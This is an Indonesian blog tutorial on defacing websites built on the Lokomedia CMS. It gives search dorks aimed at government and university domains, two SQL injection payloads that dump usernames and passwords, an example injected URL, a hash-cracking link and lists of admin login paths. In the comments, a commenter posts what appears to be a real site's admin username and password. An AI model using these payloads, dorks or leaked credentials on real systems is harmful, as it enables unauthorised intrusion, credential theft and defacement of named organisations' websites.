Deface Menggunakan SQLi Lokomedia
ok langsung saja kawan
Dork 1 :
inurl:go.id inurl:statis- ext:html
inurl:ac.id inurl:statis- ext:html
inurl:com inurl:statis- ext:html
Exploit 1 :
'union+select+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+
Dork 2 :
inurl:go.id inurl:kategori- ext:html
inurl:ac.id inurl:kategori- ext:html
inurl:com inurl:kategori- ext:html
Exploit 2 :
'union%20select%20/*!50000Concat*/(username,0x20,password)+from+users--+---
Contoh kalo kalian masih belum mengerti cara exploitnya ,
www.target.com/statis-1-pengantar.html maka apabila di exploit menjadi :
www.target.com/statis--1'union+select+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+-pengantar.html
jangan lupa , Di depan angka 1 di kasih tanda setrip " - " ( tanpa tanda petik )
klo vuln nanti di titile websitenya ada username + paswordnya , tinggal pencet CTRL + U , liat di bagian titile
Oh iya gua lupa, ini link buat hash MD5 nya di sini
https://hashkiller.co.uk/md5-decrypter.aspx
biasanya login admin lokomedia
/redaktur
/adminweb
/administrator
/redaktur/index.php
/adminlogin
/admin
/login.php
/po-admin
/redakturweb
login@web
/adminpanel
/redaksi
admin login :
/adminweb
/admin
/login
/redaktur
/redakturweb
/administrator
/login@web
/adminpanel
/moderator
/operator
/webmaster
Semoga bermanfaat :D
thank's tutornya gan :v
ReplyDeletecoba cek http://idamnuriqbal.id apa ada kelemahannya gan masta, klu ada mohon info dmana letak kelemahannya. agar dapat saya perbaiki
ReplyDeleteterima kasih.
salam,
orang awam
coba cek http://idamnuriqbal.id apa ada kelemahannya gan masta, klu ada mohon info dmana letak kelemahannya. agar dapat saya perbaiki
ReplyDeleteterima kasih.
salam,
orang awam
msh rentan gan webnya :)
Deletesite : http://idamnuriqbal.id
user : dampoe
pass : memek1990